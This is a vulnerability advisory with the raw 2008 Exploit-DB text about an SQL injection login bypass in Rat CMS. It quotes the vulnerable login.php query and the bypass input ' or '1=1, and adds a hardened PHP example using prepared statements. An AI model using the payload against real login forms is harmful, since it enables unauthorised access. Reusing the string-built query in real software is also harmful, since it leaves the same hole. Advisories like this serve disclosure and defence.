Vendor: Rat CMS
By: x0r
CVSS: 7.5 HIGH
Authentication Bypass
CWE: 287
Product Name: Rat CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

The Rat Cms Auth By Pass

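A vulnerability exists in the Rat CMS login.php file: the login query is built by inserting the submitted user ID and password directly into the SQL string, so an attacker can bypass authentication with the SQL injection input ' or '1=1.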

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.
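
A hardened form of the login.php check from this advisory, as an added example that is not Rat CMS code or the advisory author's: the lookup uses a bound parameter and the password is checked with password_verify(). Table and column names come from the advisory; the function name authenticate(), the in-memory SQLite database and the password_hash() storage format (in place of MySQL PASSWORD()) are assumptions.

```php
<?php
// Added example, not Rat CMS code. Table and column names follow the advisory;
// authenticate(), the SQLite test database and the password_hash() storage
// format (replacing MySQL PASSWORD()) are assumptions.

// Hash checked when the user ID is unknown, so both paths do the same work.
define('DUMMY_HASH', password_hash('unused', PASSWORD_DEFAULT));

/** Returns the authenticated user_id, or null when the login is rejected. */
function authenticate(PDO $db, string $userId, string $password): ?string
{
    // The ? placeholder sends $userId to the driver as data, never as SQL text,
    // so quote characters in it cannot change the WHERE clause.
    $stmt = $db->prepare(
        'SELECT user_id, user_password FROM tbl_auth_user WHERE user_id = ?'
    );
    $stmt->execute([$userId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // The password never enters the query; it is compared in PHP.
    $hash = $row ? $row['user_password'] : DUMMY_HASH;
    $ok   = password_verify($password, $hash);

    return ($row && $ok) ? $row['user_id'] : null;
}

// Constructed sample data: in-memory SQLite standing in for the CMS database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tbl_auth_user (
    user_id TEXT PRIMARY KEY,
    user_password TEXT NOT NULL
)');
$ins = $db->prepare('INSERT INTO tbl_auth_user VALUES (?, ?)');
$ins->execute(['admin', password_hash('constructed-sample-pw', PASSWORD_DEFAULT)]);

// Correct credentials, then the advisory's input in both fields, then the
// advisory's input as the password for an existing user.
var_dump(authenticate($db, 'admin', 'constructed-sample-pw'));
var_dump(authenticate($db, "' or '1=1", "' or '1=1"));
var_dump(authenticate($db, 'admin', "' or '1=1"));
```

When the same function is pointed at MySQL through pdo_mysql, setting PDO::ATTR_EMULATE_PREPARES to false makes the server, rather than the client library, bind the parameter.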

Exploit-DB raw data:

---------------------------------
The Rat Cms Auth By Pass
---------------------------------
Author: x0r
Email: andry2000@hotmail.it
--------------------------------
Bug In: \login.php

	$sql = "SELECT user_id 
	        FROM tbl_auth_user
			WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";
			
$result = mysql_query($sql) or die('Query failed. ' . mysql_error()); 

Exploit: ' or '1=1

^^ Got Root?

# milw0rm.com [2008-12-15]